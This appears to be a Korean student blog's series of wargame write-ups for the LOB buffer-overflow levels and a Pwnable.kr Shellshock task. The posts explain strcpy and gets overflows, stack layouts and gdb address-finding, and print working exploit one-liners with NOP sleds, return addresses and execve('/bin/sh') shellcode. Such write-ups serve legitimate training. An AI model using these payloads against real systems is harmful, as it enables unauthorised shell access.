no image
[LOB]wolfman
소스가 전부 비슷비슷합니다 하지만 이번에는 문자열비교를한다. 이문제는 전과 비슷하게풀었는데 python 을 두번써서 비교에 안걸리게 쓴것같다. t 0xbffffdd9 가 주소값으로 explot code : ./wolfman `python -c 'print "\x90"*44 + "\xd9\xfd\xff\xbf"'` `python -c 'print "\x90" * 30 + " \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'` 파이썬을 한번만 써서 할시 저런 문장이 출력된다. 파이썬을 두번쓰니 쉘이 출력됫다.
2017.05.17
no image
[LOB]orc
전과다른건 buffer hunter 가 생겻다는 점입니다. buffer를 0 으로 초기화하는데 문제를 푸는데 딱히 걸리지않습니다. 문제풀이는 전에 풀던 goblin과 별차이가 없습니다. gdb를 통해 주소값을 찾고 이전과 스택도 같습니다. nop 40 + sfp 4 + ret 4 +nop 200 + shellcode 25 로 익스하면되겟습니다. 보면 주소값은 0xbffffc80 될 것입니다. 그렇다면 바로 익스해보면./wolfman `python -c 'print "\x90"*44 + "\x80\xfc\xff\xbf" + "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\..
2017.05.16
no image
[LOB]goblin
이번 문제에서는 환경변수를 사용해서 주소값을 받아올수없습니다. gdb 를 통해 주소값을 구해야할것같습니다. 스택의 구조는 이렇다고 볼 수 있습니다. gdb를 통해 주소값을 구하는 과정입니다. 주소값은 0xbffffca1 이되겠습니다 그렇다면 필요한것은 전부 수집한것같습니다. 페이로드는 dummy 44 + 주소값 + nop+200 + shellcode ftz 에서도 많이 봤듯이 nop를 타고 shellcode를 실행합니다.
2017.05.13
no image
LOB 서버 구축
해커스쿨에서 제공하는 이미지파일이다. http://www.hackerschool.org/Sub_Html/HS_Community/?Type=University&More_Size=-70 Vmware 를 설치 한뒤에 저파일을 더블클릭하면 vmware 에 장착되게된다. 그뒤에 실행하면 문제를 풀 수 있다! 첫문제는 gate/gate 로 들어갈 수 있다. 주의점 red hat 은 bash에서 0xff가 0x00으로 처리된다고한다 /bin/bash2 로 쉘을 변경후에 문제를 풀기바랍니다!!
2017.05.04
no image
[LOB]cobolt
gremlin과 별다른게 없어보입니다 그런데 get함수로 buffer를 받고 있습니다. 그렇다면 gets에 취약점이 존재하게 됩니다. 전과 같이 환경변수에 쉘코드를 넣어주고 주소값을 받아옵니다. 전과 같게 공격하면 먹히지않습니다 그래서 cat을 사용해서 풀었습니다 되게 간단하게 푼것같습니다.
2017.05.04
no image
[LOB]gremlin
소스가 gate와 별다른게 없어보입니다. strcpy에서 취약점이 존재하구요 메모리 구조를 보고 바로 공격해보겟습니다. buffer가 16개의 값을 주었습니다. 그렇다면 nop(20)+env(4) 로 값을 해주면 될것같습니다. 아래와 같이 환경변수 bof에 쉘코드를 넣어주고 주소값을 알아낸뒤 nop값 20 + env 4를 리틀 엔디안방식으로 넣어주면 됩니다.
2017.05.04
no image
[LOB]gate
먼저 소스를 보면 buffer로 256의 값을 받았습니다. 그런데 strcpy에서 취약점이 존재합니다. 메모리 구조를 보겟습니다. 메모리구조를보면 buffer를 256 받아주고 SFP은 4바이트 RET도 4바이트입니다. 공격은 nop로 260으로 덮어주고 환경변수를 통해 ret을 덮을것입니다. 셀코드는 http://recentr.tistory.com/46 21바이트 코드를 사용했습니다. 주소값을 얻기위해 짧게 코딩했습니다. 주소값이 나왔습니다. 0xbffffefe 리틀엔디안방식으로 값을 넣어야합니다. 260 + 0xbffffefe
2017.05.04
no image
[Pwnable.kr]ShellShock
shellshock 라는 기법은 처음들어봐서 구글링통해 좀 알게되었던것같다.` 소스대로 shellshock를 실행하니 shock_me가 출력됬다. 바로 셸쇼크해보았다. http://teamcrak.tistory.com/380 쉘쇼크포스팅
2017.05.03


소스가 전부 비슷비슷합니다 하지만 이번에는


문자열비교를한다.


이문제는 전과 비슷하게풀었는데


python 을 두번써서 비교에 안걸리게 쓴것같다. 





t



0xbffffdd9 가 주소값으로


explot code : ./wolfman `python -c 'print "\x90"*44 + "\xd9\xfd\xff\xbf"'` `python -c 'print "\x90" * 30 + " \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`




파이썬을 한번만 써서 할시 저런 문장이 출력된다.


파이썬을 두번쓰니 쉘이 출력됫다.



'Wargame - 고등학교 시절 가독성 주의 부탁드립니다.) > PWNABLE' 카테고리의 다른 글

[LOB]orc  (0) 2017.05.16
[LOB]goblin  (0) 2017.05.13
LOB 서버 구축  (0) 2017.05.04
[LOB]cobolt  (0) 2017.05.04
[LOB]gremlin  (0) 2017.05.04



전과다른건 buffer hunter 가 생겻다는 점입니다.


buffer를 0 으로 초기화하는데 


문제를 푸는데 딱히 걸리지않습니다.





문제풀이는 전에 풀던 goblin과 별차이가 없습니다.


gdb를 통해 주소값을 찾고


이전과 스택도 같습니다. 


nop 40 + sfp 4 + ret 4 +nop 200 + shellcode 25


로 익스하면되겟습니다.







보면 주소값은 0xbffffc80 될 것입니다.


그렇다면 바로 익스해보면

./wolfman `python -c 'print "\x90"*44 + "\x80\xfc\xff\xbf" + "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`




쉘이 주어집니다.



'Wargame - 고등학교 시절 가독성 주의 부탁드립니다.) > PWNABLE' 카테고리의 다른 글

[LOB]wolfman  (0) 2017.05.17
[LOB]goblin  (0) 2017.05.13
LOB 서버 구축  (0) 2017.05.04
[LOB]cobolt  (0) 2017.05.04
[LOB]gremlin  (0) 2017.05.04



이번 문제에서는 환경변수를 사용해서


주소값을 받아올수없습니다.


gdb 를 통해 주소값을 구해야할것같습니다.




스택의 구조는 



이렇다고 볼 수 있습니다.




gdb를 통해 주소값을 구하는 과정입니다.





주소값은 0xbffffca1 이되겠습니다


그렇다면 필요한것은 전부 수집한것같습니다.


페이로드는 dummy 44 + 주소값 + nop+200 + shellcode


ftz 에서도 많이 봤듯이 nop를 타고 shellcode를 실행합니다.







'Wargame - 고등학교 시절 가독성 주의 부탁드립니다.) > PWNABLE' 카테고리의 다른 글

[LOB]wolfman  (0) 2017.05.17
[LOB]orc  (0) 2017.05.16
LOB 서버 구축  (0) 2017.05.04
[LOB]cobolt  (0) 2017.05.04
[LOB]gremlin  (0) 2017.05.04

해커스쿨에서 제공하는 이미지파일이다.


http://www.hackerschool.org/Sub_Html/HS_Community/?Type=University&More_Size=-70


Vmware 를 설치 한뒤에




저파일을 더블클릭하면


vmware 에 장착되게된다.


그뒤에 실행하면




문제를 풀 수 있다!


첫문제는 gate/gate 로 들어갈 수 있다.





주의점


red hat 은 bash에서 0xff가 0x00으로 처리된다고한다


/bin/bash2 로 쉘을 변경후에 문제를 풀기바랍니다!!





'Wargame - 고등학교 시절 가독성 주의 부탁드립니다.) > PWNABLE' 카테고리의 다른 글

[LOB]orc  (0) 2017.05.16
[LOB]goblin  (0) 2017.05.13
[LOB]cobolt  (0) 2017.05.04
[LOB]gremlin  (0) 2017.05.04
[LOB]gate  (0) 2017.05.04


gremlin과 별다른게 없어보입니다 그런데


get함수로 buffer를 받고 있습니다.


그렇다면


gets에 취약점이 존재하게 됩니다.




전과 같이 환경변수에 쉘코드를 넣어주고


주소값을 받아옵니다.




전과 같게 공격하면 먹히지않습니다


그래서 cat을 사용해서 풀었습니다 



되게 간단하게 푼것같습니다.



'Wargame - 고등학교 시절 가독성 주의 부탁드립니다.) > PWNABLE' 카테고리의 다른 글

[LOB]goblin  (0) 2017.05.13
LOB 서버 구축  (0) 2017.05.04
[LOB]gremlin  (0) 2017.05.04
[LOB]gate  (0) 2017.05.04
[Pwnable.kr]ShellShock  (0) 2017.05.03


소스가 gate와 별다른게 없어보입니다.


strcpy에서 취약점이 존재하구요


메모리 구조를 보고 바로 공격해보겟습니다.





buffer가 16개의 값을 주었습니다. 그렇다면 nop(20)+env(4) 로


값을 해주면 될것같습니다.


아래와 같이 환경변수 bof에 쉘코드를 넣어주고



주소값을 알아낸뒤 nop값 20 + env 4를


리틀 엔디안방식으로 넣어주면 됩니다.



'Wargame - 고등학교 시절 가독성 주의 부탁드립니다.) > PWNABLE' 카테고리의 다른 글

LOB 서버 구축  (0) 2017.05.04
[LOB]cobolt  (0) 2017.05.04
[LOB]gate  (0) 2017.05.04
[Pwnable.kr]ShellShock  (0) 2017.05.03
[Pwnable.kr]random  (0) 2017.05.03


먼저 소스를 보면


buffer로 256의 값을 받았습니다.


그런데 strcpy에서 취약점이 존재합니다.


메모리 구조를 보겟습니다.





메모리구조를보면 buffer를 256 받아주고 SFP은 4바이트 RET도 4바이트입니다.


공격은 nop로 260으로 덮어주고 환경변수를 통해


ret을 덮을것입니다.





셀코드는 


http://recentr.tistory.com/46


21바이트 코드를 사용했습니다.





주소값을 얻기위해


짧게 코딩했습니다.



주소값이 나왔습니다.


0xbffffefe


리틀엔디안방식으로 값을 넣어야합니다.





260 + 0xbffffefe



'Wargame - 고등학교 시절 가독성 주의 부탁드립니다.) > PWNABLE' 카테고리의 다른 글

[LOB]cobolt  (0) 2017.05.04
[LOB]gremlin  (0) 2017.05.04
[Pwnable.kr]ShellShock  (0) 2017.05.03
[Pwnable.kr]random  (0) 2017.05.03
Protostar stack3  (0) 2017.04.16


shellshock 라는 기법은 처음들어봐서


구글링통해 좀 알게되었던것같다.

`        



소스대로 shellshock를 실행하니


shock_me가 출력됬다.


바로 셸쇼크해보았다.






http://teamcrak.tistory.com/380


쉘쇼크포스팅


'Wargame - 고등학교 시절 가독성 주의 부탁드립니다.) > PWNABLE' 카테고리의 다른 글

[LOB]gremlin  (0) 2017.05.04
[LOB]gate  (0) 2017.05.04
[Pwnable.kr]random  (0) 2017.05.03
Protostar stack3  (0) 2017.04.16
Protostar stack2  (0) 2017.04.16